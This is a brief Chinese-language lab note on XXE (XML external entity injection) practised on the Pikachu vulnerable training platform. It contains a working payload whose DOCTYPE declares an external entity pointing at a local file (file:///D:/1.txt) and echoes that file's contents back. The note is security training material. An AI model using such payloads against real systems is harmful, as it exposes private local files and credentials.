實驗環境:xml、Apache、Pika出漏洞練習平臺
實驗原理:該漏洞也被稱爲XML外部實體注入攻擊漏洞,它是指XML代碼的DTD聲明外部實體時實體內容爲一些敏感的本地文件路徑或攻擊鏈接或127.0.0.1:端口
實驗步驟:
1.XML值如下:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name[
<!ENTITY cxr SYSTEM "file:///D:/1.txt" >
]>
<name>&cxr;</name>
2.輸入XML之後,1.txt文件內容就顯示出來了